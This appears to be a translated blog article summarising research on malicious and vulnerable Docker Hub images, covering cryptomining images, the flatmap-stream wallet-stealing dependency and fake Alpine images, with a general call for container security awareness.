An analysis published by Prevasio revealed that more than half of the 4 million images in Docker contain at least one critical vulnerability.
Published near the end of last year, the investigation revealed that only about 20 percent of the images didn’t contain any vulnerabilities.
Given that Docker has experienced significant growth during the last few years, the vulnerabilities discovered represent critical threats for a growing number of companies. Gartner indicates that in 2022, more than 75% of organizations will be using Docker in production — at the end of 2020, only 30 % could say the same .
The analysis, given the title “Red Kangaroo,” took about a month to complete, with more than 800 computers working together . The results represent a complete analysis of the 4 million images saved in Docker Hub.
In the next few sections, we will explore the different types of vulnerabilities discovered in Docker containers in general, so that we can better protect our organizations.
With the increasing value of cryptocurrency, we also saw an increase in the temptation of cryptomining. At the beginning of 2016, one bitcoin was worth about $435. Last week, Bitcoin reached its peak value of more than $63,346, or what would be an increase of approximately 14,462.3% . According to operation Red Kangaroo, 44% of the images found had cryptomining operations, which represents the biggest category of images containing content that was malicious, or potentially harmful.
When a computer is trying to mine cryptocurrencies, in reality, it’s trying to solve a very complex problem, meanwhile it processes the bitcoin transactions — all of which together takes a lot of processing power . With respect to the difficult problem, there are a lot of computers competing to be the first to find a solution. The computer that first solves the problem receives a compensation in the form of cryptocurrency . This is a process which, as it turns out, works a little bit like a lottery . What’s more, these days, the computers that are working to solve the problems aren’t personal laptops, but rather very powerful computers. Therefore, the most powerful machines have more chances of correctly solving the problems presented.
Although there is an abundance of examples of Docker images used to mine cryptocurrencies, Palo Alto Networks explained one case in particular, which occurred in October, 2019 . The account “azurenql” in the Docker Community had 8 images published, and each one contained a variant of a script named “dao.py.” The script installed certain software, including Tor, and at the end, started up a process to mine cryptocurrencies. Here, hackers wanted to receive the benefits of having competed in the cryptocurrency lottery without having to pay the costs associated with processing and storage. In this case, the effort gained the hackers a total of $36,000.
Additionally, although cryptomining is common, there are other cases where it might be just a mere distraction. Microsoft has been warning of new attacks that use cryptocurrency mining to cover up their true purpose (while also making a little money on the side). There are hackers that, nowadays, have the true objective of discovering passwords or other sensitive information in a network; to reach their objectives, they hide their scripts inside software that mines cryptocurrencies .
This type of attack is more advanced, and typically carried out by nation-states. It looks to see that if an anti-virus software were to throw an alert, that it would be an alert related to the mining of cryptocurrencies. It’s probable that an engineer who saw this type of alert would regard it with less urgency than they would an alert relating to a script that had stolen user credentials from their network.
The vulnerabilities discovered in the Docker images don’t finish with the images alone. The images can themselves indicate that it is necessary to also install certain packets, for example Node.js packets.
According to the researchers at Prevasio, the second biggest category of “malicious or potentially harmful content” was, in reality, just one packet: flatmap-stream . This packet in particular had reached 95 million pulls, and has the objective of looking for bitcoin wallets, so as to be able to rob the private keys of the accounts . It fits to mention here that with just one pull, an entire organization could have become infected — so therefore, it’s difficult to measure the weight of the impact just with the pulls. With more than 1,482 Docker images infected with this packet, according to operation Red Kangaroo, this image deserved its own category, and was the second largest in terms of the images that had malicious or potentially harmful content.
Originally, the owner of the repository, a user named “dominictarr,” posted a comment saying that he didn’t want to continue maintaining the code for “event-stream,” and that another user, “@right9ctrl,” had sent him a message asking if they could continue maintaining the module . When “@right9ctrl” gained access to the repository, they added commits requiring their own dependency, “flatmap-stream,” which was used to rob the bitcoin wallets mentioned earlier.
This example shows an important point, that the security of docker doesn’t just depend on the images themselves, but also on all of the dependencies used in the images.
Not all that glitters is gold
Other researchers have also marked the threat that comes from unofficial repositories. A developer, for example, could think that they were downloading a copy of Jenkins, Apache Tomcat or a version of Alpine Linux. In the end, the image could serve the developer — in that the image would contain software to run as a webserver, or to automate tests — but there also exists the possibility that the application would be doing additional activities that are problematic, like mining cryptocurrencies.
Trend Micro warned last year that a user had published two images, alpine and alpine2 in Docker Hub . They indicated that a deeper analysis of the image showed that although the image used Alpine Linux, it also included instructions to download and run code to mine cryptocurrencies from a specific GitHub repository. In other words, that a container is functioning doesn’t always mean that it’s not doing something malicious under the hood.
Finally, the researchers at Prevasio have also encountered other ways applications can hide malicious content. For example, they found an application that displayed an image of different colored squares, with a note to developers saying that they should not block this part of the application. Meanwhile, the application itself was — you guessed it — mining cryptocurrencies .
The Docker documentation says that containers are secure by default . But we also know two things: like we have mentioned before, that more and more employers beginning to use Docker. Second, we also know that intrinsically vulnerabilities come from what we don’t know. For example, although Linux was considered to be a secure operating system, recently a vulnerability came to light that showed it was possible for any user to gain root access to a shell, and that the vulnerability affected the majority of Linux versions . What’s more, the vulnerability had existed for 10 years.
Also, beyond the intrinsic vulnerabilities of Linux, the growing number of programming languages (e.g. .NET Core, PowerShell, etc.) that can be executed both on Windows and Linux also demonstrate that vulnerabilities known in Windows are starting to be seen in Linux operating systems .
All this shows that it’s very likely that there are more vulnerabilities out there than the 51 percent that were identified by the researchers. Information Security represents a constant challenge, that continues evolving.